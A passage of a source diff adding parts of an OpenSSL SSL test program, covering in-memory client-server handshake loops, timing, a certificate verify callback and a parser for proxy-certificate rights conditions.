+        SSL_CTX_add_server_custom_ext(s_ctx, CUSTOM_EXT_TYPE_1,
+                                      custom_ext_1_srv_add_cb,
+                                      NULL, NULL,
+                                      custom_ext_1_srv_parse_cb, NULL);
+        SSL_CTX_add_server_custom_ext(s_ctx, CUSTOM_EXT_TYPE_2,
+                                      custom_ext_2_srv_add_cb,
+                                      NULL, NULL,
+                                      custom_ext_2_srv_parse_cb, NULL);
+        SSL_CTX_add_server_custom_ext(s_ctx, CUSTOM_EXT_TYPE_3,
+                                      custom_ext_3_srv_add_cb,
+                                      NULL, NULL,
+                                      custom_ext_3_srv_parse_cb, NULL);
+    }
+
+    if (alpn_server)
+        SSL_CTX_set_alpn_select_cb(s_ctx, cb_server_alpn, NULL);
+
+    if (alpn_client) {
+        unsigned short alpn_len;
+        unsigned char *alpn = next_protos_parse(&alpn_len, alpn_client);
+
+        if (alpn == NULL) {
+            BIO_printf(bio_err, "Error parsing -alpn_client argument\n");
+            goto end;
+        }
+        SSL_CTX_set_alpn_protos(c_ctx, alpn, alpn_len);
+        OPENSSL_free(alpn);
+    }
+
+    c_ssl = SSL_new(c_ctx);
+    s_ssl = SSL_new(s_ctx);
+
+#ifndef OPENSSL_NO_KRB5
+    if (c_ssl && c_ssl->kssl_ctx) {
+        char localhost[MAXHOSTNAMELEN + 2];
+
+        if (gethostname(localhost, sizeof localhost - 1) == 0) {
+            localhost[sizeof localhost - 1] = '\0';
+            if (strlen(localhost) == sizeof localhost - 1) {
+                BIO_printf(bio_err, "localhost name too long\n");
+                goto end;
+            }
+            kssl_ctx_setstring(c_ssl->kssl_ctx, KSSL_SERVER, localhost);
+        }
+    }
+#endif                          /* OPENSSL_NO_KRB5 */
+
+    for (i = 0; i < number; i++) {
+        if (!reuse)
+            SSL_set_session(c_ssl, NULL);
+        if (bio_pair)
+            ret = doit_biopair(s_ssl, c_ssl, bytes, &s_time, &c_time);
+        else
+            ret = doit(s_ssl, c_ssl, bytes);
+    }
+
+    if (!verbose) {
+        print_details(c_ssl, "");
+    }
+    if ((number > 1) || (bytes > 1L))
+        BIO_printf(bio_stdout, "%d handshakes of %ld bytes done\n", number,
+                   bytes);
+    if (print_time) {
+#ifdef CLOCKS_PER_SEC
+        /*
+         * "To determine the time in seconds, the value returned by the clock
+         * function should be divided by the value of the macro
+         * CLOCKS_PER_SEC." -- ISO/IEC 9899
+         */
+        BIO_printf(bio_stdout, "Approximate total server time: %6.2f s\n"
+                   "Approximate total client time: %6.2f s\n",
+                   (double)s_time / CLOCKS_PER_SEC,
+                   (double)c_time / CLOCKS_PER_SEC);
+#else
+        /*
+         * "`CLOCKS_PER_SEC' undeclared (first use this function)" -- cc on
+         * NeXTstep/OpenStep
+         */
+        BIO_printf(bio_stdout,
+                   "Approximate total server time: %6.2f units\n"
+                   "Approximate total client time: %6.2f units\n",
+                   (double)s_time, (double)c_time);
+#endif
+    }
+
+    SSL_free(s_ssl);
+    SSL_free(c_ssl);
+
+ end:
+    if (s_ctx != NULL)
+        SSL_CTX_free(s_ctx);
+    if (c_ctx != NULL)
+        SSL_CTX_free(c_ctx);
+
+    if (bio_stdout != NULL)
+        BIO_free(bio_stdout);
+
+#ifndef OPENSSL_NO_RSA
+    free_tmp_rsa();
+#endif
+#ifndef OPENSSL_NO_ENGINE
+    ENGINE_cleanup();
+#endif
+    CRYPTO_cleanup_all_ex_data();
+    ERR_free_strings();
+    ERR_remove_thread_state(NULL);
+    EVP_cleanup();
+    CRYPTO_mem_leaks(bio_err);
+    if (bio_err != NULL)
+        BIO_free(bio_err);
+    EXIT(ret);
+    return ret;
+}
+
+int doit_biopair(SSL *s_ssl, SSL *c_ssl, long count,
+                 clock_t *s_time, clock_t *c_time)
+{
+    long cw_num = count, cr_num = count, sw_num = count, sr_num = count;
+    BIO *s_ssl_bio = NULL, *c_ssl_bio = NULL;
+    BIO *server = NULL, *server_io = NULL, *client = NULL, *client_io = NULL;
+    int ret = 1;
+
+    size_t bufsiz = 256;        /* small buffer for testing */
+
+    if (!BIO_new_bio_pair(&server, bufsiz, &server_io, bufsiz))
+        goto err;
+    if (!BIO_new_bio_pair(&client, bufsiz, &client_io, bufsiz))
+        goto err;
+
+    s_ssl_bio = BIO_new(BIO_f_ssl());
+    if (!s_ssl_bio)
+        goto err;
+
+    c_ssl_bio = BIO_new(BIO_f_ssl());
+    if (!c_ssl_bio)
+        goto err;
+
+    SSL_set_connect_state(c_ssl);
+    SSL_set_bio(c_ssl, client, client);
+    (void)BIO_set_ssl(c_ssl_bio, c_ssl, BIO_NOCLOSE);
+
+    SSL_set_accept_state(s_ssl);
+    SSL_set_bio(s_ssl, server, server);
+    (void)BIO_set_ssl(s_ssl_bio, s_ssl, BIO_NOCLOSE);
+
+    do {
+        /*-
+         * c_ssl_bio:          SSL filter BIO
+         *
+         * client:             pseudo-I/O for SSL library
+         *
+         * client_io:          client's SSL communication; usually to be
+         *                     relayed over some I/O facility, but in this
+         *                     test program, we're the server, too:
+         *
+         * server_io:          server's SSL communication
+         *
+         * server:             pseudo-I/O for SSL library
+         *
+         * s_ssl_bio:          SSL filter BIO
+         *
+         * The client and the server each employ a "BIO pair":
+         * client + client_io, server + server_io.
+         * BIO pairs are symmetric.  A BIO pair behaves similar
+         * to a non-blocking socketpair (but both endpoints must
+         * be handled by the same thread).
+         * [Here we could connect client and server to the ends
+         * of a single BIO pair, but then this code would be less
+         * suitable as an example for BIO pairs in general.]
+         *
+         * Useful functions for querying the state of BIO pair endpoints:
+         *
+         * BIO_ctrl_pending(bio)              number of bytes we can read now
+         * BIO_ctrl_get_read_request(bio)     number of bytes needed to fulfil
+         *                                      other side's read attempt
+         * BIO_ctrl_get_write_guarantee(bio)   number of bytes we can write now
+         *
+         * ..._read_request is never more than ..._write_guarantee;
+         * it depends on the application which one you should use.
+         */
+
+        /*
+         * We have non-blocking behaviour throughout this test program, but
+         * can be sure that there is *some* progress in each iteration; so we
+         * don't have to worry about ..._SHOULD_READ or ..._SHOULD_WRITE --
+         * we just try everything in each iteration
+         */
+
+        {
+            /* CLIENT */
+
+            MS_STATIC char cbuf[1024 * 8];
+            int i, r;
+            clock_t c_clock = clock();
+
+            memset(cbuf, 0, sizeof(cbuf));
+
+            if (debug)
+                if (SSL_in_init(c_ssl))
+                    printf("client waiting in SSL_connect - %s\n",
+                           SSL_state_string_long(c_ssl));
+
+            if (cw_num > 0) {
+                /* Write to server. */
+
+                if (cw_num > (long)sizeof cbuf)
+                    i = sizeof cbuf;
+                else
+                    i = (int)cw_num;
+                r = BIO_write(c_ssl_bio, cbuf, i);
+                if (r < 0) {
+                    if (!BIO_should_retry(c_ssl_bio)) {
+                        fprintf(stderr, "ERROR in CLIENT\n");
+                        goto err;
+                    }
+                    /*
+                     * BIO_should_retry(...) can just be ignored here. The
+                     * library expects us to call BIO_write with the same
+                     * arguments again, and that's what we will do in the
+                     * next iteration.
+                     */
+                } else if (r == 0) {
+                    fprintf(stderr, "SSL CLIENT STARTUP FAILED\n");
+                    goto err;
+                } else {
+                    if (debug)
+                        printf("client wrote %d\n", r);
+                    cw_num -= r;
+                }
+            }
+
+            if (cr_num > 0) {
+                /* Read from server. */
+
+                r = BIO_read(c_ssl_bio, cbuf, sizeof(cbuf));
+                if (r < 0) {
+                    if (!BIO_should_retry(c_ssl_bio)) {
+                        fprintf(stderr, "ERROR in CLIENT\n");
+                        goto err;
+                    }
+                    /*
+                     * Again, "BIO_should_retry" can be ignored.
+                     */
+                } else if (r == 0) {
+                    fprintf(stderr, "SSL CLIENT STARTUP FAILED\n");
+                    goto err;
+                } else {
+                    if (debug)
+                        printf("client read %d\n", r);
+                    cr_num -= r;
+                }
+            }
+
+            /*
+             * c_time and s_time increments will typically be very small
+             * (depending on machine speed and clock tick intervals), but
+             * sampling over a large number of connections should result in
+             * fairly accurate figures.  We cannot guarantee a lot, however
+             * -- if each connection lasts for exactly one clock tick, it
+             * will be counted only for the client or only for the server or
+             * even not at all.
+             */
+            *c_time += (clock() - c_clock);
+        }
+
+        {
+            /* SERVER */
+
+            MS_STATIC char sbuf[1024 * 8];
+            int i, r;
+            clock_t s_clock = clock();
+
+            memset(sbuf, 0, sizeof(sbuf));
+
+            if (debug)
+                if (SSL_in_init(s_ssl))
+                    printf("server waiting in SSL_accept - %s\n",
+                           SSL_state_string_long(s_ssl));
+
+            if (sw_num > 0) {
+                /* Write to client. */
+
+                if (sw_num > (long)sizeof sbuf)
+                    i = sizeof sbuf;
+                else
+                    i = (int)sw_num;
+                r = BIO_write(s_ssl_bio, sbuf, i);
+                if (r < 0) {
+                    if (!BIO_should_retry(s_ssl_bio)) {
+                        fprintf(stderr, "ERROR in SERVER\n");
+                        goto err;
+                    }
+                    /* Ignore "BIO_should_retry". */
+                } else if (r == 0) {
+                    fprintf(stderr, "SSL SERVER STARTUP FAILED\n");
+                    goto err;
+                } else {
+                    if (debug)
+                        printf("server wrote %d\n", r);
+                    sw_num -= r;
+                }
+            }
+
+            if (sr_num > 0) {
+                /* Read from client. */
+
+                r = BIO_read(s_ssl_bio, sbuf, sizeof(sbuf));
+                if (r < 0) {
+                    if (!BIO_should_retry(s_ssl_bio)) {
+                        fprintf(stderr, "ERROR in SERVER\n");
+                        goto err;
+                    }
+                    /* blah, blah */
+                } else if (r == 0) {
+                    fprintf(stderr, "SSL SERVER STARTUP FAILED\n");
+                    goto err;
+                } else {
+                    if (debug)
+                        printf("server read %d\n", r);
+                    sr_num -= r;
+                }
+            }
+
+            *s_time += (clock() - s_clock);
+        }
+
+        {
+            /* "I/O" BETWEEN CLIENT AND SERVER. */
+
+            size_t r1, r2;
+            BIO *io1 = server_io, *io2 = client_io;
+            /*
+             * we use the non-copying interface for io1 and the standard
+             * BIO_write/BIO_read interface for io2
+             */
+
+            static int prev_progress = 1;
+            int progress = 0;
+
+            /* io1 to io2 */
+            do {
+                size_t num;
+                int r;
+
+                r1 = BIO_ctrl_pending(io1);
+                r2 = BIO_ctrl_get_write_guarantee(io2);
+
+                num = r1;
+                if (r2 < num)
+                    num = r2;
+                if (num) {
+                    char *dataptr;
+
+                    if (INT_MAX < num) /* yeah, right */
+                        num = INT_MAX;
+
+                    r = BIO_nread(io1, &dataptr, (int)num);
+                    assert(r > 0);
+                    assert(r <= (int)num);
+                    /*
+                     * possibly r < num (non-contiguous data)
+                     */
+                    num = r;
+                    r = BIO_write(io2, dataptr, (int)num);
+                    if (r != (int)num) { /* can't happen */
+                        fprintf(stderr, "ERROR: BIO_write could not write "
+                                "BIO_ctrl_get_write_guarantee() bytes");
+                        goto err;
+                    }
+                    progress = 1;
+
+                    if (debug)
+                        printf((io1 == client_io) ?
+                               "C->S relaying: %d bytes\n" :
+                               "S->C relaying: %d bytes\n", (int)num);
+                }
+            }
+            while (r1 && r2);
+
+            /* io2 to io1 */
+            {
+                size_t num;
+                int r;
+
+                r1 = BIO_ctrl_pending(io2);
+                r2 = BIO_ctrl_get_read_request(io1);
+                /*
+                 * here we could use ..._get_write_guarantee instead of
+                 * ..._get_read_request, but by using the latter we test
+                 * restartability of the SSL implementation more thoroughly
+                 */
+                num = r1;
+                if (r2 < num)
+                    num = r2;
+                if (num) {
+                    char *dataptr;
+
+                    if (INT_MAX < num)
+                        num = INT_MAX;
+
+                    if (num > 1)
+                        --num;  /* test restartability even more thoroughly */
+
+                    r = BIO_nwrite0(io1, &dataptr);
+                    assert(r > 0);
+                    if (r < (int)num)
+                        num = r;
+                    r = BIO_read(io2, dataptr, (int)num);
+                    if (r != (int)num) { /* can't happen */
+                        fprintf(stderr, "ERROR: BIO_read could not read "
+                                "BIO_ctrl_pending() bytes");
+                        goto err;
+                    }
+                    progress = 1;
+                    r = BIO_nwrite(io1, &dataptr, (int)num);
+                    if (r != (int)num) { /* can't happen */
+                        fprintf(stderr, "ERROR: BIO_nwrite() did not accept "
+                                "BIO_nwrite0() bytes");
+                        goto err;
+                    }
+
+                    if (debug)
+                        printf((io2 == client_io) ?
+                               "C->S relaying: %d bytes\n" :
+                               "S->C relaying: %d bytes\n", (int)num);
+                }
+            }                   /* no loop, BIO_ctrl_get_read_request now
+                                 * returns 0 anyway */
+
+            if (!progress && !prev_progress)
+                if (cw_num > 0 || cr_num > 0 || sw_num > 0 || sr_num > 0) {
+                    fprintf(stderr, "ERROR: got stuck\n");
+                    if (strcmp("SSLv2", SSL_get_version(c_ssl)) == 0) {
+                        fprintf(stderr, "This can happen for SSL2 because "
+                                "CLIENT-FINISHED and SERVER-VERIFY are written \n"
+                                "concurrently ...");
+                        if (strncmp("2SCF", SSL_state_string(c_ssl), 4) == 0
+                            && strncmp("2SSV", SSL_state_string(s_ssl),
+                                       4) == 0) {
+                            fprintf(stderr, " ok.\n");
+                            goto end;
+                        }
+                    }
+                    fprintf(stderr, " ERROR.\n");
+                    goto err;
+                }
+            prev_progress = progress;
+        }
+    }
+    while (cw_num > 0 || cr_num > 0 || sw_num > 0 || sr_num > 0);
+
+    if (verbose)
+        print_details(c_ssl, "DONE via BIO pair: ");
+
+    if (verify_serverinfo() < 0) {
+        ret = 1;
+        goto err;
+    }
+    if (verify_alpn(c_ssl, s_ssl) < 0) {
+        ret = 1;
+        goto err;
+    }
+
+    if (custom_ext_error) {
+        ret = 1;
+        goto err;
+    }
+
+ end:
+    ret = 0;
+
+ err:
+    ERR_print_errors(bio_err);
+
+    if (server)
+        BIO_free(server);
+    if (server_io)
+        BIO_free(server_io);
+    if (client)
+        BIO_free(client);
+    if (client_io)
+        BIO_free(client_io);
+    if (s_ssl_bio)
+        BIO_free(s_ssl_bio);
+    if (c_ssl_bio)
+        BIO_free(c_ssl_bio);
+
+    return ret;
+}
+
+#define W_READ  1
+#define W_WRITE 2
+#define C_DONE  1
+#define S_DONE  2
+
+int doit(SSL *s_ssl, SSL *c_ssl, long count)
+{
+    char *cbuf = NULL, *sbuf = NULL;
+    long bufsiz;
+    long cw_num = count, cr_num = count;
+    long sw_num = count, sr_num = count;
+    int ret = 1;
+    BIO *c_to_s = NULL;
+    BIO *s_to_c = NULL;
+    BIO *c_bio = NULL;
+    BIO *s_bio = NULL;
+    int c_r, c_w, s_r, s_w;
+    int i, j;
+    int done = 0;
+    int c_write, s_write;
+    int do_server = 0, do_client = 0;
+    int max_frag = 5 * 1024;
+
+    bufsiz = count > 40 * 1024 ? 40 * 1024 : count;
+
+    if ((cbuf = OPENSSL_malloc(bufsiz)) == NULL)
+        goto err;
+    if ((sbuf = OPENSSL_malloc(bufsiz)) == NULL)
+        goto err;
+
+    memset(cbuf, 0, bufsiz);
+    memset(sbuf, 0, bufsiz);
+
+    c_to_s = BIO_new(BIO_s_mem());
+    s_to_c = BIO_new(BIO_s_mem());
+    if ((s_to_c == NULL) || (c_to_s == NULL)) {
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+
+    c_bio = BIO_new(BIO_f_ssl());
+    s_bio = BIO_new(BIO_f_ssl());
+    if ((c_bio == NULL) || (s_bio == NULL)) {
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+
+    SSL_set_connect_state(c_ssl);
+    SSL_set_bio(c_ssl, s_to_c, c_to_s);
+    SSL_set_max_send_fragment(c_ssl, max_frag);
+    BIO_set_ssl(c_bio, c_ssl, BIO_NOCLOSE);
+
+    SSL_set_accept_state(s_ssl);
+    SSL_set_bio(s_ssl, c_to_s, s_to_c);
+    SSL_set_max_send_fragment(s_ssl, max_frag);
+    BIO_set_ssl(s_bio, s_ssl, BIO_NOCLOSE);
+
+    c_r = 0;
+    s_r = 1;
+    c_w = 1;
+    s_w = 0;
+    c_write = 1, s_write = 0;
+
+    /* We can always do writes */
+    for (;;) {
+        do_server = 0;
+        do_client = 0;
+
+        i = (int)BIO_pending(s_bio);
+        if ((i && s_r) || s_w)
+            do_server = 1;
+
+        i = (int)BIO_pending(c_bio);
+        if ((i && c_r) || c_w)
+            do_client = 1;
+
+        if (do_server && debug) {
+            if (SSL_in_init(s_ssl))
+                printf("server waiting in SSL_accept - %s\n",
+                       SSL_state_string_long(s_ssl));
+/*-
+            else if (s_write)
+                printf("server:SSL_write()\n");
+            else
+                printf("server:SSL_read()\n"); */
+        }
+
+        if (do_client && debug) {
+            if (SSL_in_init(c_ssl))
+                printf("client waiting in SSL_connect - %s\n",
+                       SSL_state_string_long(c_ssl));
+/*-
+            else if (c_write)
+                printf("client:SSL_write()\n");
+            else
+                printf("client:SSL_read()\n"); */
+        }
+
+        if (!do_client && !do_server) {
+            fprintf(stdout, "ERROR IN STARTUP\n");
+            ERR_print_errors(bio_err);
+            break;
+        }
+        if (do_client && !(done & C_DONE)) {
+            if (c_write) {
+                j = (cw_num > bufsiz) ? (int)bufsiz : (int)cw_num;
+                i = BIO_write(c_bio, cbuf, j);
+                if (i < 0) {
+                    c_r = 0;
+                    c_w = 0;
+                    if (BIO_should_retry(c_bio)) {
+                        if (BIO_should_read(c_bio))
+                            c_r = 1;
+                        if (BIO_should_write(c_bio))
+                            c_w = 1;
+                    } else {
+                        fprintf(stderr, "ERROR in CLIENT\n");
+                        ERR_print_errors(bio_err);
+                        goto err;
+                    }
+                } else if (i == 0) {
+                    fprintf(stderr, "SSL CLIENT STARTUP FAILED\n");
+                    goto err;
+                } else {
+                    if (debug)
+                        printf("client wrote %d\n", i);
+                    /* ok */
+                    s_r = 1;
+                    c_write = 0;
+                    cw_num -= i;
+                    if (max_frag > 1029)
+                        SSL_set_max_send_fragment(c_ssl, max_frag -= 5);
+                }
+            } else {
+                i = BIO_read(c_bio, cbuf, bufsiz);
+                if (i < 0) {
+                    c_r = 0;
+                    c_w = 0;
+                    if (BIO_should_retry(c_bio)) {
+                        if (BIO_should_read(c_bio))
+                            c_r = 1;
+                        if (BIO_should_write(c_bio))
+                            c_w = 1;
+                    } else {
+                        fprintf(stderr, "ERROR in CLIENT\n");
+                        ERR_print_errors(bio_err);
+                        goto err;
+                    }
+                } else if (i == 0) {
+                    fprintf(stderr, "SSL CLIENT STARTUP FAILED\n");
+                    goto err;
+                } else {
+                    if (debug)
+                        printf("client read %d\n", i);
+                    cr_num -= i;
+                    if (sw_num > 0) {
+                        s_write = 1;
+                        s_w = 1;
+                    }
+                    if (cr_num <= 0) {
+                        s_write = 1;
+                        s_w = 1;
+                        done = S_DONE | C_DONE;
+                    }
+                }
+            }
+        }
+
+        if (do_server && !(done & S_DONE)) {
+            if (!s_write) {
+                i = BIO_read(s_bio, sbuf, bufsiz);
+                if (i < 0) {
+                    s_r = 0;
+                    s_w = 0;
+                    if (BIO_should_retry(s_bio)) {
+                        if (BIO_should_read(s_bio))
+                            s_r = 1;
+                        if (BIO_should_write(s_bio))
+                            s_w = 1;
+                    } else {
+                        fprintf(stderr, "ERROR in SERVER\n");
+                        ERR_print_errors(bio_err);
+                        goto err;
+                    }
+                } else if (i == 0) {
+                    ERR_print_errors(bio_err);
+                    fprintf(stderr,
+                            "SSL SERVER STARTUP FAILED in SSL_read\n");
+                    goto err;
+                } else {
+                    if (debug)
+                        printf("server read %d\n", i);
+                    sr_num -= i;
+                    if (cw_num > 0) {
+                        c_write = 1;
+                        c_w = 1;
+                    }
+                    if (sr_num <= 0) {
+                        s_write = 1;
+                        s_w = 1;
+                        c_write = 0;
+                    }
+                }
+            } else {
+                j = (sw_num > bufsiz) ? (int)bufsiz : (int)sw_num;
+                i = BIO_write(s_bio, sbuf, j);
+                if (i < 0) {
+                    s_r = 0;
+                    s_w = 0;
+                    if (BIO_should_retry(s_bio)) {
+                        if (BIO_should_read(s_bio))
+                            s_r = 1;
+                        if (BIO_should_write(s_bio))
+                            s_w = 1;
+                    } else {
+                        fprintf(stderr, "ERROR in SERVER\n");
+                        ERR_print_errors(bio_err);
+                        goto err;
+                    }
+                } else if (i == 0) {
+                    ERR_print_errors(bio_err);
+                    fprintf(stderr,
+                            "SSL SERVER STARTUP FAILED in SSL_write\n");
+                    goto err;
+                } else {
+                    if (debug)
+                        printf("server wrote %d\n", i);
+                    sw_num -= i;
+                    s_write = 0;
+                    c_r = 1;
+                    if (sw_num <= 0)
+                        done |= S_DONE;
+                    if (max_frag > 1029)
+                        SSL_set_max_send_fragment(s_ssl, max_frag -= 5);
+                }
+            }
+        }
+
+        if ((done & S_DONE) && (done & C_DONE))
+            break;
+    }
+
+    if (verbose)
+        print_details(c_ssl, "DONE: ");
+    if (verify_serverinfo() < 0) {
+        ret = 1;
+        goto err;
+    }
+    if (custom_ext_error) {
+        ret = 1;
+        goto err;
+    }
+    ret = 0;
+ err:
+    /*
+     * We have to set the BIO's to NULL otherwise they will be
+     * OPENSSL_free()ed twice.  Once when th s_ssl is SSL_free()ed and again
+     * when c_ssl is SSL_free()ed. This is a hack required because s_ssl and
+     * c_ssl are sharing the same BIO structure and SSL_set_bio() and
+     * SSL_free() automatically BIO_free non NULL entries. You should not
+     * normally do this or be required to do this
+     */
+    if (s_ssl != NULL) {
+        s_ssl->rbio = NULL;
+        s_ssl->wbio = NULL;
+    }
+    if (c_ssl != NULL) {
+        c_ssl->rbio = NULL;
+        c_ssl->wbio = NULL;
+    }
+
+    if (c_to_s != NULL)
+        BIO_free(c_to_s);
+    if (s_to_c != NULL)
+        BIO_free(s_to_c);
+    if (c_bio != NULL)
+        BIO_free_all(c_bio);
+    if (s_bio != NULL)
+        BIO_free_all(s_bio);
+
+    if (cbuf)
+        OPENSSL_free(cbuf);
+    if (sbuf)
+        OPENSSL_free(sbuf);
+
+    return (ret);
+}
+
+static int get_proxy_auth_ex_data_idx(void)
+{
+    static volatile int idx = -1;
+    if (idx < 0) {
+        CRYPTO_w_lock(CRYPTO_LOCK_SSL_CTX);
+        if (idx < 0) {
+            idx = X509_STORE_CTX_get_ex_new_index(0,
+                                                  "SSLtest for verify callback",
+                                                  NULL, NULL, NULL);
+        }
+        CRYPTO_w_unlock(CRYPTO_LOCK_SSL_CTX);
+    }
+    return idx;
+}
+
+static int MS_CALLBACK verify_callback(int ok, X509_STORE_CTX *ctx)
+{
+    char *s, buf[256];
+
+    s = X509_NAME_oneline(X509_get_subject_name(ctx->current_cert), buf,
+                          sizeof buf);
+    if (s != NULL) {
+        if (ok)
+            fprintf(stderr, "depth=%d %s\n", ctx->error_depth, buf);
+        else {
+            fprintf(stderr, "depth=%d error=%d %s\n",
+                    ctx->error_depth, ctx->error, buf);
+        }
+    }
+
+    if (ok == 0) {
+        fprintf(stderr, "Error string: %s\n",
+                X509_verify_cert_error_string(ctx->error));
+        switch (ctx->error) {
+        case X509_V_ERR_CERT_NOT_YET_VALID:
+        case X509_V_ERR_CERT_HAS_EXPIRED:
+        case X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT:
+            fprintf(stderr, "  ... ignored.\n");
+            ok = 1;
+        }
+    }
+
+    if (ok == 1) {
+        X509 *xs = ctx->current_cert;
+#if 0
+        X509 *xi = ctx->current_issuer;
+#endif
+
+        if (xs->ex_flags & EXFLAG_PROXY) {
+            unsigned int *letters = X509_STORE_CTX_get_ex_data(ctx,
+                                                               get_proxy_auth_ex_data_idx
+                                                               ());
+
+            if (letters) {
+                int found_any = 0;
+                int i;
+                PROXY_CERT_INFO_EXTENSION *pci =
+                    X509_get_ext_d2i(xs, NID_proxyCertInfo,
+                                     NULL, NULL);
+
+                switch (OBJ_obj2nid(pci->proxyPolicy->policyLanguage)) {
+                case NID_Independent:
+                    /*
+                     * Completely meaningless in this program, as there's no
+                     * way to grant explicit rights to a specific PrC.
+                     * Basically, using id-ppl-Independent is the perfect way
+                     * to grant no rights at all.
+                     */
+                    fprintf(stderr, "  Independent proxy certificate");
+                    for (i = 0; i < 26; i++)
+                        letters[i] = 0;
+                    break;
+                case NID_id_ppl_inheritAll:
+                    /*
+                     * This is basically a NOP, we simply let the current
+                     * rights stand as they are.
+                     */
+                    fprintf(stderr, "  Proxy certificate inherits all");
+                    break;
+                default:
+                    s = (char *)
+                        pci->proxyPolicy->policy->data;
+                    i = pci->proxyPolicy->policy->length;
+
+                    /*
+                     * The algorithm works as follows: it is assumed that
+                     * previous iterations or the initial granted rights has
+                     * already set some elements of `letters'.  What we need
+                     * to do is to clear those that weren't granted by the
+                     * current PrC as well.  The easiest way to do this is to
+                     * add 1 to all the elements whose letters are given with
+                     * the current policy. That way, all elements that are
+                     * set by the current policy and were already set by
+                     * earlier policies and through the original grant of
+                     * rights will get the value 2 or higher. The last thing
+                     * to do is to sweep through `letters' and keep the
+                     * elements having the value 2 as set, and clear all the
+                     * others.
+                     */
+
+                    fprintf(stderr, "  Certificate proxy rights = %*.*s", i,
+                            i, s);
+                    while (i-- > 0) {
+                        int c = *s++;
+                        if (isascii(c) && isalpha(c)) {
+                            if (islower(c))
+                                c = toupper(c);
+                            letters[c - 'A']++;
+                        }
+                    }
+                    for (i = 0; i < 26; i++)
+                        if (letters[i] < 2)
+                            letters[i] = 0;
+                        else
+                            letters[i] = 1;
+                }
+
+                found_any = 0;
+                fprintf(stderr, ", resulting proxy rights = ");
+                for (i = 0; i < 26; i++)
+                    if (letters[i]) {
+                        fprintf(stderr, "%c", i + 'A');
+                        found_any = 1;
+                    }
+                if (!found_any)
+                    fprintf(stderr, "none");
+                fprintf(stderr, "\n");
+
+                PROXY_CERT_INFO_EXTENSION_free(pci);
+            }
+        }
+    }
+
+    return (ok);
+}
+
+static void process_proxy_debug(int indent, const char *format, ...)
+{
+    /* That's 80 > */
+    static const char indentation[] =
+        ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>"
+        ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>";
+    char my_format[256];
+    va_list args;
+
+    BIO_snprintf(my_format, sizeof(my_format), "%*.*s %s",
+                 indent, indent, indentation, format);
+
+    va_start(args, format);
+    vfprintf(stderr, my_format, args);
+    va_end(args);
+}
+
+/*-
+ * Priority levels:
+ *  0   [!]var, ()
+ *  1   & ^
+ *  2   |
+ */
+static int process_proxy_cond_adders(unsigned int letters[26],
+                                     const char *cond, const char **cond_end,
+                                     int *pos, int indent);
+static int process_proxy_cond_val(unsigned int letters[26], const char *cond,
+                                  const char **cond_end, int *pos, int indent)
+{
+    int c;
+    int ok = 1;
+    int negate = 0;
+
+    while (isspace((int)*cond)) {
+        cond++;
+        (*pos)++;
+    }
+    c = *cond;
+
+    if (debug)
+        process_proxy_debug(indent,
+                            "Start process_proxy_cond_val at position %d: %s\n",
+                            *pos, cond);
+
+    while (c == '!') {
+        negate = !negate;
+        cond++;
+        (*pos)++;
+        while (isspace((int)*cond)) {
+            cond++;
+            (*pos)++;
+        }
+        c = *cond;
+    }
+
+    if (c == '(') {
+        cond++;
+        (*pos)++;
+        ok = process_proxy_cond_adders(letters, cond, cond_end, pos,
+                                       indent + 1);
+        cond = *cond_end;
+        if (ok < 0)
+            goto end;
+        while (isspace((int)*cond)) {
+            cond++;
+            (*pos)++;
+        }
+        c = *cond;
+        if (c != ')') {
+            fprintf(stderr,
+                    "Weird condition character in position %d: "
+                    "%c\n", *pos, c);
+            ok = -1;
+            goto end;
+        }
+        cond++;
+        (*pos)++;
+    } else if (isascii(c) && isalpha(c)) {
+        if (islower(c))
+            c = toupper(c);
+        ok = letters[c - 'A'];
+        cond++;
+        (*pos)++;
+    } else {
+        fprintf(stderr,
+                "Weird condition character in position %d: " "%c\n", *pos, c);
+        ok = -1;
+        goto end;
+    }
+ end:
+    *cond_end = cond;
+    if (ok >= 0 && negate)
+        ok = !ok;
+
+    if (debug)
+        process_proxy_debug(indent,
+                            "End process_proxy_cond_val at position %d: %s, returning %d\n",
+                            *pos, cond, ok);
+
+    return ok;
+}
+
+static int process_proxy_cond_multipliers(unsigned int letters[26],
+                                          const char *cond,
+                                          const char **cond_end, int *pos,
+                                          int indent)
+{
+    int ok;
+    char c;
+
+    if (debug)
+        process_proxy_debug(indent,
+                            "Start process_proxy_cond_multipliers at position %d: %s\n",
+                            *pos, cond);
+
+    ok = process_proxy_cond_val(letters, cond, cond_end, pos, indent + 1);
+    cond = *cond_end;
+    if (ok < 0)
+        goto end;
+
+    while (ok >= 0) {
+        while (isspace((int)*cond)) {
+            cond++;
+            (*pos)++;
+        }
+        c = *cond;
+
+        switch (c) {
+        case '&':
+        case '^':
+            {
+                int save_ok = ok;
+
+                cond++;
+                (*pos)++;
+                ok = process_proxy_cond_val(letters,
+                                            cond, cond_end, pos, indent + 1);
+                cond = *cond_end;
+                if (ok < 0)
+                    break;
+
+                switch (c) {
+                case '&':
+                    ok &= save_ok;
+                    break;
+                case '^':
+                    ok ^= save_ok;
+                    break;
+                default:
+                    fprintf(stderr, "SOMETHING IS SERIOUSLY WRONG!"
+                            " STOPPING\n");
+                    EXIT(1);
+                }
+            }
+            break;
+        default:
+            goto end;
+        }
+    }
+ end:
+    if (debug)
+        process_proxy_debug(indent,
+                            "End process_proxy_cond_multipliers at position %d: %s, returning %d\n",
+                            *pos, cond, ok);
+
+    *cond_end = cond;
+    return ok;
+}
+
+static int process_proxy_cond_adders(unsigned int letters[26],
+                                     const char *cond, const char **cond_end,
+                                     int *pos, int indent)
+{
+    int ok;
+    char c;
+
+    if (debug)
+        process_proxy_debug(indent,
+                            "Start process_proxy_cond_adders at position %d: %s\n",
+                            *pos, cond);
+
+    ok = process_proxy_cond_multipliers(letters, cond, cond_end, pos,
+                                        indent + 1);
+    cond = *cond_end;
+    if (ok < 0)
+        goto end;
+
+    while (ok >= 0) {
+        while (isspace((int)*cond)) {
+            cond++;
+            (*pos)++;
+        }
+        c = *cond;
+
+        switch (c) {
+        case '|':
+            {
+                int save_ok = ok;
+
+                cond++;
+                (*pos)++;
+                ok = process_proxy_cond_multipliers(letters,
+                                                    cond, cond_end, pos,
+                                                    indent + 1);
+                cond = *cond_end;
+                if (ok < 0)
+                    break;
+
+                switch (c) {
